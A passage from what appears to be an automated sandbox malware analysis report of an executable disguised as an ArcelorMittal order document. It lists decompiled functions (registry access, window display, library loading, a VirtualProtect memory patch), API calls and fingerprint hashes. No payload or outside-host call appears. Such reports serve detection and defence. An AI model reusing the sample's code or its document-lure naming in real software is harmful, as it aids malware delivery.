                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
                                                • Instruction ID: f6a722eb4006bf24fd89555576c47c1226d97d21954259867b0b9a1495a6a6e6
                                                • Opcode Fuzzy Hash: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
                                                • Instruction Fuzzy Hash: 6F219531900209EBCF20AFA5CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0040249E(int* __ebx, short* __esi) {
				void* _t7;
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				short* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t7 = E00402CC9(_t25, 0x20019); // executed
				_t18 = _t7;
				_t8 = E00402BA2(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x1c)) == __ebx) {
						_t11 = RegEnumValueW(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyW(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18);
						RegCloseKey();
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}











                                                0x0040249e
                                                0x0040249e
                                                0x004024a3
                                                0x004024aa
                                                0x004024ac
                                                0x004024b3
                                                0x004024b6
                                                0x0040281e
                                                0x0040281e
                                                0x004024bc
                                                0x004024c4
                                                0x004024c7
                                                0x004024e0
                                                0x004024e6
                                                0x004024e8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004024c9
                                                0x004024cd
                                                0x004024ee
                                                0x004024ee
                                                0x004024f5
                                                0x004024f6
                                                0x004024f6
                                                0x004024c7
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                • RegEnumValueW.ADVAPI32 ref: 004024E0
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Enum$CloseOpenValue
                                                • String ID:
                                                • API String ID: 167947723-0
                                                • Opcode ID: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
                                                • Instruction ID: b3b69fb6c0ab9d70611345d1cc2aadb4deec7d6fa7b8fc5cea9b38d3f519ee44
                                                • Opcode Fuzzy Hash: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
                                                • Instruction Fuzzy Hash: 38F08171A00204ABEB209FA5DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100027C7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}



                                                0x100027d0
                                                0x100027d5
                                                0x100027e5
                                                0x100027ed
                                                0x100027f4
                                                0x100027f9
                                                0x100027fe
                                                0x10002803
                                                0x10002808
                                                0x1000280d
                                                0x10002812
                                                0x10002812
                                                0x1000281a

                                                APIs
                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID: `g)w@M)w
                                                • API String ID: 544645111-4193802306
                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8a70;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a2c =  *0x7a7a2c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a2c, 0x7530,  *0x7a7a14), 0); // executed
					}
				}
				return 0;
			}











                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
                                                • Instruction ID: 4d11fbcb8758acff49efb51301ce17a4c0d3f2729c831b224df7ca8d4f3fd522
                                                • Opcode Fuzzy Hash: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
                                                • Instruction Fuzzy Hash: 0D01F432624210ABE7095B389D04B6A3698E755314F10C53FF851F66F1DA78CC02DB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040231F(void* __ebx) {
				short* _t6;
				long _t8;
				void* _t11;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x1c) - __ebx;
				if( *(_t23 - 0x1c) != __ebx) {
					_t6 = E00402BBF(0x22);
					_t18 =  *(_t23 - 0x1c) & 0x00000002;
					__eflags =  *(_t23 - 0x1c) & 0x00000002;
					_t8 = E00402BFF(E00402CB4( *((intOrPtr*)(_t23 - 0x28))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t11 = E00402CC9(_t26, 2); // executed
					_t22 = _t11;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueW(_t22, E00402BBF(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}










                                                0x0040231f
                                                0x0040231f
                                                0x00402322
                                                0x00402351
                                                0x00402359
                                                0x00402359
                                                0x00402367
                                                0x0040236c
                                                0x00000000
                                                0x00402324
                                                0x00402326
                                                0x0040232b
                                                0x0040232f
                                                0x0040281e
                                                0x0040281e
                                                0x00402335
                                                0x00402345
                                                0x00402347
                                                0x0040236e
                                                0x00402370
                                                0x00000000
                                                0x00402376
                                                0x00402370
                                                0x0040232f
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040233E
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID:
                                                • API String ID: 849931509-0
                                                • Opcode ID: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
                                                • Instruction ID: 84b37c2a738164438e1dccf168bab5f9c0075825efa18c6fe23cdbeb1825a049
                                                • Opcode Fuzzy Hash: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
                                                • Instruction Fuzzy Hash: 03F04F72A04110ABEB11BFF59B4EABE7269AB80314F15803BF501B71D5D9FC99015629
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040156B Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040156B(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x7a7a10; // 0x0
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x28));
					_t4 =  *(_t16 - 0x2c);
				}
				_t12 =  *0x7a7a24; // 0x103b4
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}








                                                0x0040156b
                                                0x0040156b
                                                0x00401579
                                                0x0040157f
                                                0x00401581
                                                0x00401581
                                                0x00401584
                                                0x0040158c
                                                0x00401594
                                                0x00401594
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • ShowWindow.USER32(00000000,?), ref: 0040157F
                                                • ShowWindow.USER32(000103B4), ref: 00401594
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
                                                • Instruction ID: ed417bde94489f19056025a1bce11d2b054895382ff63e29ca54f2f43ae8860f
                                                • Opcode Fuzzy Hash: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
                                                • Instruction Fuzzy Hash: AFE048727141049BCB14DBA8DD808AE77A6A784310714843BD502B3660C678DD10CF68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406408 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00406408(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a400);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a400));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a404));
				}
				_t5 = E0040639C(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                0x00406410
                                                0x00406413
                                                0x0040641a
                                                0x00406422
                                                0x0040642e
                                                0x00000000
                                                0x00406435
                                                0x00406425
                                                0x0040642c
                                                0x00000000
                                                0x0040643d
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                  • Part of subcall function 0040639C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
                                                  • Part of subcall function 0040639C: wsprintfW.USER32 ref: 004063EE
                                                  • Part of subcall function 0040639C: LoadLibraryW.KERNELBASE(?), ref: 004063FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                • Instruction ID: 1e5dc79a2ed4663847ded95c08da113472191569ceef3ff13fe49cb738333a03
                                                • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                • Instruction Fuzzy Hash: 67E0863660422056D2105B745E44D3762A89F94700306043EFA42F2041DB789C32AB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
                                                • Instruction ID: b4fe0a8816f2230fb6c640b22720df2591e8103d6b5d86596318fd3cb962ccd0
                                                • Opcode Fuzzy Hash: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
                                                • Instruction Fuzzy Hash: B9E0C2326005009FCB10AFF5AF4999D3375EF90369710407FE402F10E1CABC9C408A2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405C07 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E00405C07(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                0x00405c0b
                                                0x00405c18
                                                0x00405c2d
                                                0x00405c33

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
